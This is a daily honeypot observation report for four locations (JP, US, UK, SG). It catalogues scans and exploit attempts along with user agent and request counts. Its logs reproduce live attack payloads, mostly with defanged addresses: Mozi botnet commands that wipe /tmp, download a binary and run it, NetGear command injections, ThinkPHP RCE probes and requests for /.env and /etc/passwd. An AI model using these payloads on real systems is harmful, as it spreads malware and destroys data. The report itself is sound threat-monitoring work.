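Honeypot (tentative) observation record for 2021/04/06.
Features
Common
Accesses targeting a GPON router vulnerability
Accesses targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Accesses targeting the PHPUnit vulnerability (CVE-2017-9841)
Accesses targeting a ThinkPHP vulnerability
Scanning of Apache Solr
Scanning of Laravel
Scanning of WordPress plugins
Location:JP
Accesses with the UserAgent Hello, World
Accesses with the UserAgent Hello, world
The above were observed.
The following accesses to /shell were observed.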
cd /tmp; rm -rf *; wget http[:]//178[.]175[.]17[.]75:45626/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget http[:]//27[.]41[.]5[.]128:60348/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
Scanning of Apache Tomcat
Scanning of WordPress
Unauthorized communication involving 110[.]242[.]68[.]4
Accesses with the UserAgent Hello, World
The above were observed.
Location:UK
Accesses targeting a vulnerability in NetGear products
Scanning for /.env
Accesses with the UserAgent Hello, World
Accesses with the UserAgent Hello, world
The above were observed.
The following accesses to /shell were observed.
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
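Accesses targeting a vulnerability in NetGear products
Scanning by ZmEu
Scanning for /.env
Scanning of Apache Tomcat
Scanning of phpMyAdmin
Scanning of WordPress
Unauthorized communication involving 110[.]242[.]68[.]4
Unauthorized communication involving 112[.]124[.]42[.]80
Accesses with the UserAgent Hello, World
Accesses with the UserAgent Hello, world
The above were observed.
The following accesses to /shell were observed.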
cd /tmp; rm -rf *; wget http[:]//58[.]253[.]8[.]32:56495/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
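Other
Access count trend
JP: total accesses: 48 (change from previous day: -59)
US: total accesses: 78 (change from previous day: +21)
UK: total accesses: 33 (change from previous day: -132)
SG: total accesses: 76 (change from previous day: +16)
For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.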
Location:JP
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
6 | - |
1 | Hello, World |
2 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
11 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
3 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
2 | python-requests/2.18.4 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01 | | |
12 | GET | /.env | HTTP/1.1 |
1 | GET | /.git | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
3 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /dump.sql | HTTP/1.1 |
1 | GET | /etc/passwd | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
2 | GET | /myjsp.jsp | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]175[.]17[.]75:45626/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]41[.]5[.]128:60348/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//passport[.]baidu[.]com/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /index.htm | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
4 | PUT | /myjsp.jsp/ | HTTP/1.1 |
Location:US
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
6 | - |
1 | Hello, World |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
28 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
5 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 OPR/54.0.2952.51 |
5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302 |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | - | | |
3 | \x16\x03\x01 | | |
1 | CONNECT | cn[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]so[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com/:443 | HTTP/1.1 |
6 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= | HTTP/1.1 |
4 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
4 | GET | /jenkins/login | HTTP/1.1 |
4 | GET | /login | HTTP/1.1 |
5 | GET | /manager/html | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
4 | GET | /wp-login.php | HTTP/1.1 |
1 | GET | http[:]//dongtaiwang[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
1 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http[:]//www[.]soso[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
1 | HEAD | http[:]//110[.]242[.]68[.]4/ | HTTP/1.1 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
4 | POST | /_ignition/execute-solution | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
6 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//impius[.]fun/fa12f2b318e5a114804cac9882f5d1d278ebe8226aa27ff517d21b64304a103f7967141c67424fbd3afba93d6eecb5b8d6a854d718a5ab8cd7bcd7e7fe535a00a6670097075349307d3c4318c7713ba6c4eb7b525a9a7f6dc250654bcbe24b3a | HTTP/1.1 |
Location:UK
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
8 | - |
1 | Hello, World |
1 | Hello, world |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
7 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | python-requests/2.18.4 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | | |
2 | \x16\x03\x01 | | |
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
4 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /aaa9 | HTTP/1.1 |
1 | GET | /aab9 | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
2 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]224[.]169[.]47:49104/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//m[.]baidu[.]com/?r=_1498538301212398101517164 | HTTP/1.0 |
1 | GET | http[:]//www[.]ceek[.]jp/?r=_860017139210108501118592 | HTTP/1.0 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
Source IP addresses
UserAgent list
Count | UserAgent |
---|---|
9 | - |
2 | Chrome/54.0 (Windows NT 10.0) |
1 | Hello, World |
1 | Hello, world |
6 | Mozilla/5.0 |
15 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
12 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
1 | Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
1 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
2 | ZmEu |
1 | python-requests/2.18.4 |
Request list
Count | Method | Request | Protocol |
---|---|---|---|
3 | \x03 | | |
1 | \x16\x03 | | |
1 | \x16\x03\x01 | | |
1 | CONNECT | cn[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | m[.]blog[.]naver[.]com:443 | HTTP/1.1 |
1 | CONNECT | m[.]blog[.]naver[.]com:80 | HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]coupang[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]coupang[.]com/:80 | HTTP/1.1 |
1 | CONNECT | www[.]so[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]youtube[.]com/:443 | HTTP/1.1 |
1 | CONNECT | www[.]youtube[.]com/:80 | HTTP/1.1 |
7 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= | HTTP/1.1 |
3 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP | HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /app/.env | HTTP/1.1 |
1 | GET | /config/getuser?index=0 | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /core/.env | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
2 | GET | /jenkins/login | HTTP/1.1 |
2 | GET | /login | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /public/.env | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]32[.]69:46282/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]253[.]8[.]32:56495/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /storage/.env | HTTP/1.1 |
1 | GET | /vendor/.env | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
2 | GET | /wp-login.php | HTTP/1.1 |
1 | GET | http[:]//dongtaiwang[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]epochtimes[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
1 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
1 | GET | http[:]//www[.]soso[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
3 | HEAD | / | HTTP/1.1 |
1 | HEAD | http[:]//110[.]242[.]68[.]4/ | HTTP/1.1 |
1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /_ignition/execute-solution | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
3 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//grzej[.]xyz/ff0261a6604249c93b4788e49f1effe2910de02a11ad21e153549795550db795a7c1ced398cead867cc08af6078a6683b1b729b7c5c1b8f0bdd8e74afeb1624d77a027f31c10b49eb19425c70e94c7e6c5e53991ffccf54c10cd151b03cd6916 | HTTP/1.1 |